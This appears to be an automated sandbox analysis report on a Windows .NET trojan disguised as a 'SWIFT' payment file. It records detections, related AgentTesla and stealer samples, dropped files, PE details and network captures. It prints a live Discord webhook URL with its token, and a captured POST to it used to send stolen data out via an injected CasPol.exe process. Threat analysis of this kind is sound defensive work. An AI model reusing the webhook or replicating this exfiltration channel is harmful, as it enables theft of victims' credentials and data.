                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
                Process Injection
                NTDS1
                Remote System Discovery
                Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information
                LSA Secrets24
                System Information Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common3
                Software Packing
                Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SWIFT05062023.exe23%VirustotalBrowse
                SWIFT05062023.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://discord.com0%URL Reputationsafe
                http://discord.com0%URL Reputationsafe
                https://discord.com40%URL Reputationsafe
                https://discord.com/api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLv0%Avira URL Cloudsafe
                https://discord.com/api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr90%Avira URL Cloudsafe
                https://discord.comD80%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                discord.com
                162.159.137.232
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://discord.com/api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr9true
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://discord.comCasPol.exe, 00000001.00000002.800774951.00000000036A0000.00000004.00000800.00020000.00000000.sdmptrue
                  • URL Reputation: safe
                  unknown
                  https://cdn.discordapp.com/attachments/1114977416134279200/1115663130656251924/user-226546_2023-06-CasPol.exe, 00000001.00000002.800774951.0000000003754000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://discord.comCasPol.exe, 00000001.00000002.800774951.00000000036B7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://discord.comD8CasPol.exe, 00000001.00000002.800774951.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://discord.com/api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvCasPol.exe, 00000001.00000002.800774951.0000000003641000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://discord.com4CasPol.exe, 00000001.00000002.800774951.00000000036A0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000001.00000002.800774951.00000000036A0000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://cdn.discordapp.com/attachments/1114977416134279200/1115663127888011334/user-226546_2023-06-CasPol.exe, 00000001.00000002.800774951.00000000036D7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.800774951.00000000036D3000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://media.discordapp.net/attachments/1114977416134279200/1115663130656251924/user-226546_2023-0CasPol.exe, 00000001.00000002.800774951.0000000003754000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://media.discordapp.net/attachments/1114977416134279200/1115663127888011334/user-226546_2023-0CasPol.exe, 00000001.00000002.800774951.00000000036D7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.800774951.00000000036D3000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            162.159.137.232
                            discord.comUnited States
                            13335CLOUDFLARENETUStrue
                            Joe Sandbox Version:37.1.0 Beryl
                            Analysis ID:882717
                            Start date and time:2023-06-06 17:25:56 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 14s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:4
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:SWIFT05062023.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/2@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 12.7% (good quality ratio 7.6%)
                            • Quality average: 35.2%
                            • Quality standard deviation: 32.8%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 14
                            • Number of non-executed functions: 1
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe
                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            162.159.137.232Our_Quote._#._FP2315.exeGet hashmaliciousAgentTeslaBrowse
                              zIJElVbBti.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                pJn38FquDNO4yDn.exeGet hashmaliciousAgentTeslaBrowse
                                  New_Badge_Guide.pdf.exeGet hashmaliciousDiscord Token StealerBrowse
                                    VespyGrabber.exeGet hashmaliciousDiscord Token StealerBrowse
                                      idunno.exeGet hashmaliciousAgentTeslaBrowse
                                        New_Order.exeGet hashmaliciousAgentTeslaBrowse
                                          DHL_KULI500796821__SCAN_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                            SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
                                              http://binaecn.comGet hashmaliciousUnknownBrowse
                                                Calculator.exeGet hashmaliciousDiscord Token StealerBrowse
                                                  FlappyBird.exeGet hashmaliciousUnknownBrowse
                                                    UG9qipNNYt.exeGet hashmaliciousVector StealerBrowse
                                                      Ref[GLV905879617]_ACH_credits_Customer_Ref[LOCAL1]_Second_Party_Ref[].jsGet hashmaliciousVector StealerBrowse
                                                        PDA.PDF.jsGet hashmaliciousVector StealerBrowse
                                                          obfuscated.jsGet hashmaliciousVector StealerBrowse
                                                            Creal.exeGet hashmaliciousCreal StealerBrowse
                                                              v3NesZhLpp.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                Dekont-c,pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                  ffdh07v2cv.exeGet hashmaliciousAgentTeslaBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    discord.comsample.exeGet hashmaliciousUnknownBrowse
                                                                    • 162.159.128.233
                                                                    PAP46E1UkZ.exeGet hashmaliciousUnknownBrowse
                                                                    • 162.159.128.233
                                                                    file.exeGet hashmaliciousVector StealerBrowse
                                                                    • 162.159.136.232
                                                                    rTR013.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.128.233
                                                                    https://colabot-network.com/Get hashmaliciousUnknownBrowse
                                                                    • 162.159.128.233
                                                                    Our_Quote._#._FP2315.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.136.232
                                                                    INVOICE1008.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.136.232
                                                                    04451999.exe.lnkGet hashmaliciousUnknownBrowse
                                                                    • 162.159.138.232
                                                                    Nitro_Generator.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                    • 162.159.138.232
                                                                    ap6B2upFrF.exeGet hashmaliciousAsyncRAT, DcRat, StormKittyBrowse
                                                                    • 162.159.138.232
                                                                    KwW85078PI.exeGet hashmaliciousAxlockerBrowse
                                                                    • 162.159.138.232
                                                                    zIJElVbBti.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.137.232
                                                                    05500299.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, SmokeLoaderBrowse
                                                                    • 162.159.136.232
                                                                    pJn38FquDNO4yDn.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.137.232
                                                                    YAL7a7hHg1.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.138.232
                                                                    SdbEyrUJjQ.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.138.232
                                                                    wsj57XA5zz.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.138.232
                                                                    file.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                                                                    • 162.159.136.232
                                                                    LumiaSpoofer.cracked.exeGet hashmaliciousHog GrabberBrowse
                                                                    • 162.159.138.232
                                                                    6ft0YnCx0B.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.135.232
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUShttps://t.email.currys.co.uk/r/?id=h7aa4a341,8b3374d,743904&p1=concretocasa.com.br%2Fhtml%2Fssl%2Ffyvqcw/anBlcmtpbnNAaGFycmlzd2lsbGlhbXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.16.126.175
                                                                    https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=QuGBQKkE202XUxH-a0a_31t9L-AKA-hDuT6jUCbQfK9UOTBVMkpERFE0M1JPOVcyN1NOSVU1VU1OUS4uGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.18.10.207
                                                                    https://www.bing.com/ck/a?!&&p=6e9dcf551f0e9608JmltdHM9MTY4NTkyMzIwMCZpZ3VpZD0xYzFjMDg1MS1hYmE2LTY4ZTItMDE2Yi0xYjcyYWE0ODY5MDQmaW5zaWQ9NTE2Mg&ptn=3&hsh=3&fclid=1c1c0851-aba6-68e2-016b-1b72aa486904&u=a1aHR0cDovL2dlY2tvY2VyYW1pY3MuY28ua2Uv#bHVjaWFuYWdAZ3VsZnN0cmVhbW1hcmluZS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    https://1drv.ms/o/s!BJGtiAXrkAT5sHKaA7Q3uiRSCQWt?e=BnSDr3RKSUKQc9YPYENGmQ&at=9Get hashmaliciousHTMLPhisher, SharepointPhisherBrowse
                                                                    • 104.18.11.207
                                                                    https://1drv.ms/o/s!AjqtXAyN5UCSgRgQFIvIhHjCCJjt?e=HlipCNGet hashmaliciousUnknownBrowse
                                                                    • 104.16.123.96
                                                                    PROPOSAL.emlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 172.67.185.88
                                                                    https://1uvb4gp37m-teamsharpoin2-sbs.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wappGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    https://pub-b2955bd5cc5a447cba7f9017e8915538.r2.dev/webmail.html#support@midlandcomputers.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 172.67.155.92
                                                                    http://metahelpid812374812344411.comGet hashmaliciousUnknownBrowse
                                                                    • 104.18.16.182
                                                                    https://www.bing.com/ck/a?!&&p=c5bd7fb5e432c63eJmltdHM9MTY4MjQ2NzIwMCZpZ3VpZD0wNDVjZTI0Ny0wZGFkLTY5YTktMmI1ZS1mMGI0MGMyNjY4YjEmaW5zaWQ9NTIyMA&ptn=3&hsh=3&fclid=045ce247-0dad-69a9-2b5e-f0b40c2668b1&u=a1aHR0cHM6Ly9nYXJhbmRndXkuY29tL3RlYW0v#M=blablabla@blibliblo.orgGet hashmaliciousUnknownBrowse
                                                                    • 188.114.96.7
                                                                    https://flying-swift-amaryllis.glitch.me/?id=bderville@norauto.comGet hashmaliciousUnknownBrowse
                                                                    • 188.114.97.3
                                                                    https://protect-us.mimecast.com/s/rSy2Crk5YKF2ADjnF7Z1mv?domain=1drv.msGet hashmaliciousUnknownBrowse
                                                                    • 104.21.92.28
                                                                    file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 104.18.8.146
                                                                    https://bit.ly/45JVb3RGet hashmaliciousUnknownBrowse
                                                                    • 1.1.1.1
                                                                    PV Questionnaire - Order Fulfillment and Supporting IT.docxGet hashmaliciousUnknownBrowse
                                                                    • 104.18.169.114
                                                                    sP5ZYLQ4X2.exeGet hashmaliciousEternity StealerBrowse
                                                                    • 172.67.34.170
                                                                    Anon.htmlGet hashmaliciousUnknownBrowse
                                                                    • 1.1.1.1
                                                                    file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 104.21.56.85
                                                                    https://xxhdfilm.online/807774-/25D8/25AE-%D9%85-%D8%B4-%D9%84%D9%84%D8%AA%D9%85%D9%88%D9%8A%D9%84-%D8%A7%D9%84%D9%88%D9%81%D8%A7%D9%82-%D8%B4%D8%B1%D9%83Get hashmaliciousUnknownBrowse
                                                                    • 188.114.96.3
                                                                    file_48f710813aed49f29612fb0e5d9e19fb_2023-06-06_12_42_35_915000.zipGet hashmaliciousUnknownBrowse
                                                                    • 1.1.1.1
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0eDKRE01119383.exeGet hashmaliciousUnknownBrowse
                                                                    • 162.159.137.232
                                                                    https://protect-us.mimecast.com/s/rSy2Crk5YKF2ADjnF7Z1mv?domain=1drv.msGet hashmaliciousUnknownBrowse
                                                                    • 162.159.137.232
                                                                    SOA.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.137.232
                                                                    sP5ZYLQ4X2.exeGet hashmaliciousEternity StealerBrowse
                                                                    • 162.159.137.232
                                                                    shipping_documents.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.137.232
                                                                    registry.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.137.232
                                                                    may.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.137.232
                                                                    Urgent_PO.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.137.232
                                                                    Bank_Slip.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.137.232
                                                                    PAYMENT_COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.137.232
                                                                    NEW_ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.137.232
                                                                    Sipari#U015fi_P.O_4029064_Decorgru_pdf.exeGet hashmaliciousLokibotBrowse
                                                                    • 162.159.137.232
                                                                    STMTCMB100_20230501.EXE.exeGet hashmaliciousUnknownBrowse
                                                                    • 162.159.137.232
                                                                    Fiyat_teklifi_Istegi_23051609051_#U00fcrun_Etiket_scan0010_xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.137.232
                                                                    obizx.bin.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.137.232
                                                                    sample.exeGet hashmaliciousUnknownBrowse
                                                                    • 162.159.137.232
                                                                    8Bdwzkseq1DI4PR.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    • 162.159.137.232
                                                                    BL-SHIPPING_DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.137.232
                                                                    Pre-alert_M160-450278703.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.137.232
                                                                    INV_#21855.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.137.232
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\SWIFT05062023.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):226
                                                                    Entropy (8bit):5.354940450065058
                                                                    Encrypted:false
                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                    MD5:B10E37251C5B495643F331DB2EEC3394
                                                                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):0.43613063485556663
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLqlUIFnGP6Gkwtwhg4FdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0u9z3:TLqlj1czkwubXYFpFNYcw+6UwcYzHr
                                                                    MD5:46076967A4692D6323BCBDAD8532DA6A
                                                                    SHA1:A2C61F0EAECF8C2D126FCF82828808B78291E582
                                                                    SHA-256:BFA77719DCA9C4C92B38BD8A23C9DD751B82DB0F21620E6937C4F97AECC5536B
                                                                    SHA-512:B4C03F075B2E4DC527AD25B5D5788BE55D4CBCCA66002884CC75528FC57AF54C494B2219C726999E9A29C5AB05C789DB1412F4A01A8AC61726E2F7B785E77691
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.899151052069721
                                                                    TrID:
                                                                    • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                    • Win64 Executable GUI (202006/5) 46.43%
                                                                    • Win64 Executable (generic) (12005/4) 2.76%
                                                                    • Generic Win/DOS Executable (2004/3) 0.46%
                                                                    • DOS Executable Generic (2002/1) 0.46%
                                                                    File name:SWIFT05062023.exe
                                                                    File size:217664
                                                                    MD5:b7475f585b317b4cdb0f385f147e635d
                                                                    SHA1:c88c9416ffc3d97ac9ed1aeed6558c6f1b610207
                                                                    SHA256:46887ad939b1f8d5e6588548aef4ebcbb3e924df26efc74ee5ddcdad4a23ed20
                                                                    SHA512:63b82be56196ddb78ad93dd766f13ec488cae0b7ef73b04ac8915a5a9718b5228288b2081b442fc00618da2aa85cb137ea1b37ed6c3cd2fbe398cd0d3b343577
                                                                    SSDEEP:3072:7CNkuMjNMFLm5HLcWbMRtBpzAGpyycA8g4qEs95M/ZAB0BoAXgihJxP91fNWCs01:ZuAMlm9XbMBpznVrjEs9ilggCUhVvj5
                                                                    TLSH:0D24DF8D7650B6EFC99BC4329AE81DA4FF6075BA430B0257A027159DDF4C687CF280B6
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....~d..............0......V................@...... .......................`............`...@......@............... .....
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x400000
                                                                    Entrypoint Section:
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x647EDF17 [Tue Jun 6 07:24:07 2023 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:
                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                    Error Number:-2146869232
                                                                    Not Before, Not After
                                                                    • 12/13/2021 1:00:00 AM 1/9/2025 12:59:59 AM
                                                                    Subject Chain
                                                                    • CN=philandro Software GmbH, O=philandro Software GmbH, L=Stuttgart, S=Baden-W\xfcrttemberg, C=DE
                                                                    Version:3
                                                                    Thumbprint MD5:EAE713DFC05244CF4301BF1C9F68B1BE
                                                                    Thumbprint SHA-1:9CD1DDB78ED05282353B20CDFE8FA0A4FB6C1ECE
                                                                    Thumbprint SHA-256:9D7620A4CEBA92370E8828B3CB1007AEFF63AB36A2CBE5F044FDDE14ABAB1EBF
                                                                    Serial:0DBF152DEAF0B981A8A938D53F769DB8
                                                                    Instruction
                                                                    dec ebp
                                                                    pop edx
                                                                    nop
                                                                    add byte ptr [ebx], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax+eax], al
                                                                    add byte ptr [eax], al
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x596.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x30c000x4640
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x87180x1c.text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x80000x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    5d)=X0x20000x4ebc0x5000False1.00078125COM executable for DOS7.990624932753266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .text0x80000x2b0380x2b200False0.9324558423913043data7.893170542920391IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x340000x5960x600False0.412109375data4.077724048266111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_VERSION0x340a00x30cdata
                                                                    RT_MANIFEST0x343ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    192.168.2.4162.159.137.232496954432851779 06/06/23-17:26:57.544403TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49695443192.168.2.4162.159.137.232
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jun 6, 2023 17:26:57.192792892 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:57.192887068 CEST44349695162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:57.193042040 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:57.223968983 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:57.224036932 CEST44349695162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:57.281002998 CEST44349695162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:57.285382986 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:57.306180000 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:57.306231976 CEST44349695162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:57.306657076 CEST44349695162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:57.348021030 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:57.524627924 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:57.543656111 CEST44349695162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:57.544289112 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:57.588314056 CEST44349695162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:57.863557100 CEST44349695162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:57.863801003 CEST44349695162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:57.863918066 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:57.867252111 CEST49695443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:58.139624119 CEST49696443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:58.139700890 CEST44349696162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:58.139810085 CEST49696443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:58.140410900 CEST49696443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:58.140458107 CEST44349696162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:58.182255030 CEST44349696162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:58.186325073 CEST49696443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:58.186382055 CEST44349696162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:58.253760099 CEST44349696162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:58.254376888 CEST49696443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:58.254411936 CEST44349696162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:58.518281937 CEST44349696162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:58.518502951 CEST44349696162.159.137.232192.168.2.4
                                                                    Jun 6, 2023 17:26:58.518681049 CEST49696443192.168.2.4162.159.137.232
                                                                    Jun 6, 2023 17:26:58.519684076 CEST49696443192.168.2.4162.159.137.232
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jun 6, 2023 17:26:57.149080038 CEST5223953192.168.2.48.8.8.8
                                                                    Jun 6, 2023 17:26:57.176099062 CEST53522398.8.8.8192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jun 6, 2023 17:26:57.149080038 CEST192.168.2.48.8.8.80x7d6aStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jun 6, 2023 17:26:57.176099062 CEST8.8.8.8192.168.2.40x7d6aNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                    Jun 6, 2023 17:26:57.176099062 CEST8.8.8.8192.168.2.40x7d6aNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                    Jun 6, 2023 17:26:57.176099062 CEST8.8.8.8192.168.2.40x7d6aNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                    Jun 6, 2023 17:26:57.176099062 CEST8.8.8.8192.168.2.40x7d6aNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                    Jun 6, 2023 17:26:57.176099062 CEST8.8.8.8192.168.2.40x7d6aNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                    • discord.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.449695162.159.137.232443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2023-06-06 15:26:57 UTC0OUTPOST /api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr9 HTTP/1.1
